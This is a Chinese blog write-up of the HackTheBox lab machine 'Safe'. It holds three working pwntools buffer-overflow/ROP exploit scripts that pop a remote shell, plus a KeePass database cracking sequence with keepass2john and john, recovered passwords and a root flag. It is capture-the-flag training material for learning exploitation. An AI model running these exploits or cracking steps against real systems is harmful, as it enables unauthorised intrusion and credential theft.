[Meachines] [Easy] Safe BOF+ROP链+.data节区注入BOF+函数跳转BOF+KeePass密码管理器密码破译

于 2024-08-31 19:13:03 发布
阅读量817 收藏 10
点赞数 25
分类专栏: HackTheBox PWN 文章标签: linux
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141756891
版权

信息收集

IP AddressOpening Ports
10.10.10.147TCP:22,80,1337

$ nmap -p- 10.10.10.147 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
|   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
|_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
1337/tcp open  waste?

myapp reverse && BOF

image.png

image-1.png

获取消息并且打印

$ chmod +x myapp

$ gdb -q myapp

gdb-peda$ checksec

image-2.png

CANARY: disabled — 栈保护机制被禁用,可以利用缓冲区溢出来覆盖返回地址。
FORTIFY: disabled — 代码没有使用 FORTIFY_SOURCE 进行编译,没有额外的编译时检查。
NX: ENABLED — 禁用了对堆栈执行的权限(不可执行位启用),所以不能在堆栈上直接执行 shellcode。
PIE: disabled — 可执行文件没有启用地址无关代码执行(Position Independent Executable),意味着代码段的地址是固定的。
RELRO: Partial — 部分的 RELRO 保护(即GOT表是可写的,但是GOT起始位置是不可写的)。

gdb-peda$ b main

gdb-peda$ set follow-fork-mode parent

让 GDB 在程序执行 fork() 系统调用时继续跟踪父进程,而不去跟踪子进程。

确认偏移量

gdb-peda$ pattern_create 200

AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

gdb-peda$ r

image-4.png

通过栈顶来判断偏移量

gdb-peda$ pattern_offset jAA9AAOA

image-5.png

偏移量120

gdb-peda$ python print("A" * 120 + "B" * 4)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

RIP已被修改

image-6.png

方法 1:ROP --> 泄露 libc 函数地址,计算到 libc 中 /bin/sh 字符串的偏移量,然后调用 system(“/bin/sh”)

1.payload = junk + pop_rdi + got_plt + plt_system + main

在 ELF(二进制执行和链接格式)文件中,PLT(Procedure Linkage Table)和 GOT(Global Offset Table)是用于动态链接和函数调用的重要结构。它们在程序的运行时加载和执行过程中扮演了关键角色。

PLT 是一个用于支持动态链接的表格,主要用于函数调用。当一个程序调用一个动态链接库中的函数时,实际的函数地址可能在程序加载时并未确定。PLT 解决了这个问题,通过以下方式工作:

  1. 初次调用:当程序第一次调用一个动态链接函数时,PLT 中相应的条目将跳转到一个特殊的“连接器”函数(如 ld-linux.so),该函数负责解析函数的实际地址。

  2. 解析地址:连接器函数将查找函数的真实地址,并将其更新到 GOT 中的相应位置。

  3. 后续调用:后续对该函数的调用将直接跳转到更新后的 GOT 地址,从而提高调用效率。

GOT 是一个表格,用于存储动态链接的函数和变量的地址。GOT 由编译器在编译时生成,并在程序运行时动态更新。它的作用包括:

  1. 存储地址:GOT 存储了动态链接库中的函数和全局变量的地址。在程序的执行过程中,GOT 记录了这些地址。

  2. 动态修正:在程序启动时,动态链接器会修正 GOT 中的条目,将它们指向实际的函数或变量地址。

gdb-peda$ disassemble main

image-7.png

system 的 PLT 地址(0x401040)

image-8.png

$ ropper -f myapp | grep rdi

筛选和定位 ROP gadgets(即可用于构造 ROP 链的代码片段)中涉及 rdi 寄存器的那些。这些 gadgets 可能会使用或修改 rdi 寄存器的值,因此在构造 ROP 链时,它们可能非常有用。

image-9.png

通过将 rdi 寄存器设置为 GOT 表中 puts 函数的地址,并调用 system 函数

获取puts函数地址

#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

junk = "A"*120

got_puts = p64(0x404018)
plt_system = p64(0x401040)
pop_rdi  = p64(0x40120b)
main     = p64(0x40115f)
payload = junk + pop_rdi + got_puts + plt_system + main

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
leaked_puts = u64(p.recvline().strip()[7:-11].ljust(8,"\x00"))
log.info("Leaked puts address: %x" % leaked_puts)

$ python2 pwnapp.py

image-10.png

为什么这种方法有效

  1. 缓冲区溢出:利用缓冲区溢出将执行流重定向到我们控制的代码或地址。在这个例子中,通过覆盖返回地址来使程序执行我们的 payload。

  2. 控制返回地址:通过填充数据和精心构造的 payload,我们可以将返回地址控制到 pop_rdi Gadget,这样我们可以设置 rdi 寄存器的值。

  3. 利用 GOT 表:通过修改 GOT 表中的 puts 地址,调用 puts 函数时将会跳转到我们控制的地址(如 system 函数的地址)。

  4. ROP 链:使用 pop_rdi Gadget 将 GOT 表地址设置为 puts,然后调用 system 函数,最终返回到 main 函数。

通过这些步骤,你可以利用缓冲区溢出漏洞泄露目标程序中敏感信息(如函数地址)。

这些地址每次可能会不同,但底部的 12 位(或者 1.5 字节、3 个四位组或 3 个十六进制字符),在这种情况下是 f90,将保持不变。

#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

junk = "A"*120

got_puts = p64(0x404018)
plt_system = p64(0x401040)
pop_rdi  = p64(0x40120b)
main     = p64(0x40115f)
payload = junk + pop_rdi + got_puts + plt_system + main

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
leaked_puts = u64(p.recvline().strip()[7:-11].ljust(8,"\x00"))

log.info("Leaked puts address: %x" % leaked_puts)
libc_base = leaked_puts - 0x68f90
log.info("libc_base: %x" % libc_base)

sh = p64(0x161c19 + libc_base)

payload = junk + pop_rdi + sh + plt_system
p.recvline()
p.sendline(payload)
p.interactive()

$ python2 pwnapp.py

image-11.png

方法2:将字符串/bin/sh写入.data,然后调用system()。

查询.data节区,并且确认.data节区读写权限

$ readelf -S myapp

image-12.png

WA为可读可写,地址0000000000404038

#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

junk = "A"*120

plt_gets = p64(0x401060)
plt_system = p64(0x401040)
pop_rdi = p64(0x40120b)
binsh = p64(0x404038)

payload = junk + pop_rdi + binsh + plt_gets + pop_rdi + binsh + plt_system

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
p.sendline('/bin/sh\x00')
p.interactive()

$ python2 pwnapp.py

image-13.png

方法 3:利用从未调用过的 test() 函数来跳转到 system()

gdb-peda$ disassemble test

image-14.png

将 system 的地址放入 R13 寄存器,并将 /bin/sh 放到栈顶,那么调用 test() 函数将会得到一个 shell。使用 ropper 工具来查找一个可以将 R13 赋值的 gadget。

$ ropper -f myapp | grep r13

image-15.png

第二个 Gadget: pop r13; pop r14; pop r15; ret;

  • Gadget 解释:这个 gadget 的指令是 pop r13; pop r14; pop r15; ret;。这意味着它会从栈中依次弹出三个值并将它们分别放入 R13R14R15 寄存器中,然后执行 ret 指令返回到调用点。

  • 为什么可以用

    • 直接操作 R13:该 gadget 中的第一条指令 pop r13 会将栈顶的值弹出到 R13 寄存器。这使得你可以将 system 的地址直接放入 R13
    • 多个寄存器:虽然它还会将值放入 R14R15,这些寄存器可以用来存储其他有用的数据或保持不变的值,不会影响你的攻击目标。
#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")

binsh = "/bin/sh\x00"
junk = "A"*(120 - len(binsh))
plt_system = p64(0x401040)
test = p64(0x401152)
pop_r13_r14_r15 = p64(0x401206)

payload = junk + binsh + pop_r13_r14_r15 + plt_system + p64(0) + p64(0) + test

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
p.interactive()

$ python2 pwnapp.py

image-16.png

Privilege Escalation

写入公钥连接服务器

$ ssh -i ~/.ssh/id_ed25519 user@10.10.10.147

image-17.png

image-18.png

$ scp -i ~/.ssh/id_ed25519 user@10.10.10.147:~/IMG* .

$ scp -i ~/.ssh/id_ed25519 user@10.10.10.147:~/*.kdbx .

KeePass 密码管理器使用的数据库文件格式的扩展名。KeePass 是一个流行的开源密码管理工具,它帮助用户安全地存储和管理密码、密钥和其他敏感信息。.kdbx 文件是 KeePass 生成和使用的加密数据库文件。

$ keepass2john MyPasswords.kdbx > MyPasswords.kdbx.hash; for img in $(ls IMG*); do keepass2john -k $img MyPasswords.kdbx; done >> MyPasswords.kdbx.hash

-k $img 表示使用 $img(当前遍历的文件)作为密钥文件。通常这意味着你可能会用到密钥文件来解密 KeePass 数据库。

$ john MyPasswords.kdbx.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt

image-19.png

password:bullshit

$ kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx

kpcli:/> ls

kpcli:/> cd MyPasswords/

kpcli:/MyPasswords> ls

kpcli:/MyPasswords> show 0 -f

image-20.png

password:u3v2249dl9ptv465cogl3cnpo3fyhk

image-21.png

Root.txt

bb186118ac36184650d8d6c7d4617bb3

Мартин.
关注
  • 25
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BOF算法 基于SIFT+KMeans
hwyuxuanrencai的博客
05-28 2049
BOF 计算机视觉 以图搜图 Python Bag of Features算法题目一、BOF算法是什么?二、详细步骤1.基于SIFT算法提取图像的特征2.对特征集进行K-means聚类3.获得初始BOF向量4.计算TF-IDF,并获得最终BOF5.以图搜图6.展示结果三、结果 题目 BOF算法概念、步骤、注意事项 【实验要求】使用颜色直方图或者bof算法来提取图像特征,在指定数据集上实现以图搜图,即输入数据集中某一张图,在剩下的999张图里搜索最邻近的10张图。 一、BOF算法是什么? BOF(Bag.
BOF算法+K-Means算法实现图像检索(Matlab实现代码)
SuperNova
04-13 1万+
更新: 很多同学告诉我说代码运行有问题,运行的时候缺少文件或者找不到文件,我在这里补充一下: 大家需要把里面的SIFT_features等三个文件夹添加到文件路径,不然matlab运行的时候只会搜索当前文件夹下文件。具体做法是,在matlab里面选中文件夹,右键-》添加到文件路径-》选定的文件夹和子文件夹。然后运行do_demo.m就行了再补充一下,有同学提醒说k-means算法
[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SMS-Upload-RCE+BOF缓冲区溢出-ROP权限提升
08-01 329
#zip密码爆破 #Ook!密文解密 #Play-SMS-Upload-RCE #BOF缓冲区溢出 #ROP权限提升 #ASLR地址随机化
如何使用bof-launcher在CC++Zig应用程序中执行Beacon对象文件(BOF
FreeBuf_的博客
04-26 721
bof-launcher是一个开源库,可以在Windows和UNIX/Linux系统上加载、重新定位和启动BOF。当前版本的bof-launcher支持下列功能:1、与Cobalt Strike的Beacon完全兼容,可以编译和运行Cobalt Strike Community Kit中提供的每一个BOF以及其他所有遵循通用BOF模板的开源BOF;2、作为一个完全独立的库分发,不依赖与任何其他组件(甚至不使用libc);3、支持与C/C++/Zig应用程序完美集成;
[Vulnhub] Lord-Of-The-Root Ports-Knocking+SQLI+Kernel+BOF缓冲区溢出+Mysql_UDF+ASLR
06-19 1985
#Ports-Knocking #SQLI #Kernel权限提升 #BOF缓冲区溢出权限提升 #Mysql_UDF权限提升 #gdb #ASLR地址空间布局随机化
cannnt mysql_SpringBoot+Activiti+bpmn.js+Vue.js+Elementui
热门推荐
weixin_35916106的博客
02-06 4万+
/*Navicat Premium Data TransferSource Server : mydbSource Server Type : MySQLSource Server Version : 50726Source Host : localhost:3306Source Schema : mydbTarget Server Typ...
解决xlrd.biffh.XLRDError: Unsupported format, or corrupt file: Expected BOF record; found b‘Debug is
牛肉胡辣汤
10-20 9828
在进行数据处理和分析时,我们常常需要读取和解析Excel文件。而xlrd是一个常用的Python库,用于读取Excel文件。然而,有时候当我们使用xlrd读取Excel文件时,可能会遇到"xlrd.biffh.XLRDError: Unsupported format, or corrupt file: Expected BOF record;found b'Debug is"这样的错误。这个错误通常表示Excel文件格式不受支持或者文件损坏。xlrd是一个用于读取Excel文件的Python库。
媒体计算上机之BOF+K-means
Accept1234的博客
10-31 493
BOF+kmeans 实现BOF+kmeans的以图搜图 main:主函数,图片由此输入 SIFT_feature:提取图库的总特征,并比较得出相似图片 get_sifts get_countVectors cos_simp 图库 image 搜图 search_image %main.m addpath(genpath('D:\Documents\MATLAB\siftDemoV4\image'...
php eof bof,VB中Recordset之BOF与EOF详解
weixin_42136365的博客
04-09 435
VB中Recordset之BOF与EOF详解2018-08-31 09:29阅读: id_999单身,寻另一半!!关注BOF:指当前记录位置位于Recordset对象的第一个记录之前;EOF:指当前记录位置位于Recordset对象的最后一个记录之后。这两个的属性值均返回布尔型:True和False,使用BOF和 EOF 属性可确定 Recordset对象是否包含记录,或者从一个记...
Java+opencv实现bof图像检索算法
05-22
【Java+OpenCV实现BOF图像检索算法】 在计算机视觉领域,图像检索是一个重要的任务,其目的是通过比较图像特征来找到相似的图像。本项目利用Java编程语言结合OpenCV库,实现了基于Bag of Visual Words(BOF)的图像...
KMeans+BOF实现图像检索(Matlab)
04-13
在图像检索领域,KMeans和BOF(Bag of Visual Words,视觉词袋模型)是两种常用的技术,结合Matlab编程可以构建高效的图像分类和检索系统。以下是对这两个算法及其在Matlab实现中的详细解释。 首先,KMeans算法是一...
设计分段线性函数处理图像.rar_BOF_OUX_UT5N_分段线性函数_转折点
09-21
在图像处理领域,分段线性函数是一种广泛应用的工具,特别是在色彩校正和图像增强方面。这个名为"设计分段线性函数处理图像.rar"的压缩包文件包含了关于如何使用分段线性函数来改变图像特定区域亮度和颜色的资料。...
k-means+BOF.zip_MXH_means 图像检索_sift_sift 图像检索_sift图像检索
07-15
在图像检索领域,k-means算法与Bag of Features (BOF)模型是两种常见的技术,它们常被结合使用以提高检索效率和准确性。本项目中,"k-means+BOF.zip_MXH_means 图像检索_sift_sift 图像检索_sift图像检索"的标题和...
BoF.tar.gz_BOF_bag of features
09-19
**博夫(BoF, Bag of Features)模型详解** 博夫模型是一种在计算机视觉和图像处理领域广泛应用的特征表示方法,其核心思想是将复杂的图像或视频内容抽象为一系列离散特征的组合,类似于自然语言处理中的“词袋”模型...
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 1578
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
Linux】进程|进程的查看与管理|创建进程
2202_75331338的博客
08-27 1559
❍ 课本概念:程序的一个执行实例,正在执行的程序等❍ 内核观点:担当分配系统资源(CPU时间,内存的实体)简单来说:进程 == PCB(进程控制块) + 进程对应的代码和数据;一个进程对应一个PCB操作系统对进程的管理,最终变成了对表的增删查改。注意:可执行程序加载到内存不是进程,只是进程对应的代码和数据。
linux 系统性能调优技巧
m0_50641264的博客
08-27 1290
【代码】linux 系统性能调优技巧。
linux 系统如何进行nfs(第五节)
最新发布
weixin_44767571的博客
08-30 193
首先是 在虚拟机中的操作。然后是在开发板上的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值